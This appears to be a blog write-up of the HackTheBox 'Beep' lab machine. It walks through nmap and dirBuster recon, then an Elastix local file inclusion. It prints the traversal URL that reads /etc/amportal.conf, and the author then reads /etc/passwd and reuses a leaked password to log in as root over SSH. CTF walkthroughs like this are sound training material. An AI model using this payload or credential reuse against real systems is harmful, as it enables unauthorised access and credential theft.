Ethical Hacking Lessons — Beep Writeup

6 min readNov 14, 2019

This write-up is for the hackthebox Beep machine. In the IT world, systems administrators have a huge responsibility to be meticulously careful about managing administrative passwords for privileged accounts. A seemingly benign application-level breach can turn into large-scale cyber espionage when systems administrators do not put time and effort to comply with password management best practices. This write-up demonstrates how hackers can take advantage of similar situations.

Its a Linux machine with an IP address of 10.10.10.7. The radar graph shows the presence of CVEs.

Recon

Let’s start active recon with the Nmap TCP scan.

nmap -A -T4 -p- -oX tcp_scan_results.xml 10.10.10.7

Below are the results produced by the scan.

UPD port scan seems to taking a very long time and didn’t finish.

Recon Results Analysis

There are many ports open including HTTP, SSH, SMTP. This means there is a good possibility of exploiting the machine in more than one way.

Enumeration

Let’s start by trying to finding out what is running on the port 80, so punch in the IP address on the browser. It brings up the following warning about the invalid security certificate.

I added the exception for this page. You better be careful about the site before doing it in real-life. That brought up the following elastix page.

Googling suggested that Elastix is a unified communication platform that could be used to bring together applications such as PBX, email, IM, fax etc. I looked at the source code of the home page but found nothing interesting here.

Wappalyzer was showing that its an Apache server using PHP.

I used this information to run dirBuster against the page with the following settings.

This brings back a long list of directories/files. A couple of the interesting ones are admin and help here.

Navigating to the help page shows many other links. I, in particular, was looking for any version information.

I did come across a page that mentions the freePBX version as shown below.

Next, navigating to the admin page bring up following pop-up.

I hit the cancel button as I didn’t know the credentials that brought me to the following config.php page with an unauthorized access error.

For now, I just put this information in the back of my pocket and run the searchsploit to see if there are any known vulnerabilities.

Looks like there are some vulnerabilities of interest in the Elastix application.

Enumeration Analysis

I have to admit I didn’t really enumerate all the possibilities in this box. There are so many ports open and definitely there is a lot more enumeration that could be performed. However, given that there looks like some exploits available for elastix, I wanted to try that out first.

Exploitation

Let’s start with the LFI exploit available in the searcsploit results. To start with, we can use searchsploit with -p parametre that can provide the URL for the related exploit.

Navigating to the exploit-db database for EDB-ID 37637 brought the following page.

This link describes the vulnerability as follows

Elastix is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks.

In addition, this link also provides an example of how to exploit this vulnerability.

/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

Let’ try to navigate to the same link in the browser as follows.

The output is a little jumbled up, so let’s try to view source for this page.

As some of the comments found on the page, this file contains settings for Asterisk Management Portal. The interesting thing is that some fields seem to contain a few passwords as well. Since we know for sure now that there is a Local File Inclusion vulnerability exists, there is nothing stopping us to try more files such as /etc/passwd.

Again the output is not reader-friendly, so we can try to View Source for this page as well.

At this point, I have a few usernames and passwords to play with. Soon after I was able to successfully log in to the Elastix portal using admin as username and jEhdIekWmdjE as password.

Given that during the NMap scan results, we also discovered that SSH port was open too and viewing the the output of /et/passwd file, I then attempted to login using the root with the same jEhdIekWmdjE password and it worked. Yaaay!!!